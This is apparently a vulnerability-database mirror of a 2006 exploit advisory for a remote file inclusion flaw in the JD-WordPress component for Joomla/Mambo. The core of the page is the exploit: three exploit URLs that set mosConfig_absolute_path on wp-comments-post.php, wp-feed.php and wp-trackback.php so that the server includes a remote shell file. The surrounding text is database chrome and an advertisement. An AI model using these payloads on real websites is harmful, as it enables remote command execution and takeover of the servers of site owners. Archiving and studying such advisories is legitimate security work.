Lucene search

K

JD-WordPress.txt

🗓️ 28 Jul 2006 00:00:00Reported by Drago84Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

JD-WordPress Remote File Include exploit allows remote attackers to execute commands via specific paths in WordPress pages. Bug found by Drago84.

Show more
Code
`################### Marhateo il + Lamer di mirc   
##########################################  
  
JD-WordPress -Mambo Moodle Remote File Include  
------------------------------------------------------------------------------------  
  
Bug Found by: Drago84  
  
greetz: Exclusive Security  
  
source code :   
http://www.joomladeveloping.org/content/view/17/36/  
  
This bug allows a remote atacker to execute commands via   
rfi  
path: ?mosConfig_absolute_path=  
  
page:  
wp-comments-post.php  
wp-feed.php  
wp-trackback.php  
  
xpl:  
http://web/components/com_jd-wp/wp-comments-post.php?mosConfig_absolute_path=http://shell.txt  
http://web/components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://shell.txt  
http://web/components/com_jd-wp/wp-trackback.php?mosConfig_absolute_path=http://shell.txt  
  
  
################### Marhateo il coglione di mirc   
##########################################  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
28 Jul 2006 00:00Current
7.4High risk
Vulners AI Score7.4
19
.json
Report